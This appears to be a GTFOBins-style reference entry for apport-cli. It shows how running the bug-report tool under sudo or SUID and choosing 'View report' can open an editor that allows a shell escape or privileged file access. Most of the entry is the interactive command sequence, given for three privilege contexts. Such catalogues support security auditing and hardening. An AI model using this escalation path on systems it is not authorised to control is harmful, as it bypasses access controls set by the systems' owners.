--- description: This can be run with elevated privileges to create a bug report, then view the report in a text editor, which may allow shell escapes and/or privileged file read/writes (Depending upon the default file editor program). functions: shell: - code: | apport-cli -f *** What kind of problem do you want to report? Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 *** Collecting problem information *** What display problem do you observe? Please choose (1/2/3/4/5/6/7/8/C): 2 *** Send problem report to the developers? What would you like to do? Your options are: V: View report Please choose (S/V/K/I/C): V suid: - code: | apport-cli -f *** What kind of problem do you want to report? Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 *** Collecting problem information *** What display problem do you observe? Please choose (1/2/3/4/5/6/7/8/C): 2 *** Send problem report to the developers? What would you like to do? Your options are: V: View report Please choose (S/V/K/I/C): V sudo: - code: | sudo apport-cli -f *** What kind of problem do you want to report? Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 *** Collecting problem information *** What display problem do you observe? Please choose (1/2/3/4/5/6/7/8/C): 2 *** Send problem report to the developers? What would you like to do? Your options are: V: View report Please choose (S/V/K/I/C): V ---